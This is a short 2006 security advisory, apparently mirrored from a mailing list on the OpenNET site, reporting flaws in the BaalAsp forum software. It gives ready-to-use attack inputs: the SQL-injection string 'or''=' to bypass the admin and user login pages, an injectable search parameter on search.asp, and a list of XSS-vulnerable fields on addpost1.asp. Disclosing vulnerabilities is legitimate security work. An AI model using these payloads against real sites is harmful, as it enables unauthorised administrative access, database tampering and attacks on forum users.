The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


BaalAsp forum [login bypass ,injections sql(post), xss(post)]


<< Previous INDEX Search src / Print Next >>
Date: 15 Nov 2006 17:44:25 -0000
From: [email protected]
To: [email protected]
Subject: BaalAsp forum [login bypass ,injections sql(post), xss(post)]
X-Virus-Scanned: antivirus-gw at tyumen.ru

vendor site:http://baalasp.com/
product:BaalAsp forum  
bug:login bypass, injection sql post, xss post
risk:high

authentification bypass :
admin login bypass ==> /adminlogin.asp
passwd: 'or''='
user login bypass ==> /userlogin.asp
user: 'or''='
passwd: 'or''='

injection sql (post)
==> /search.asp
variables : page=1&total=1&search='[sql]
or just post your query into the search engine

xss post : 
/addpost1.asp?
vulnerables fields :
- Subject:
- Group Name:
- Message:


laurent gaffiИ & benjamin mossИ
http://s-a-p.ca/
contact: [email protected]


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру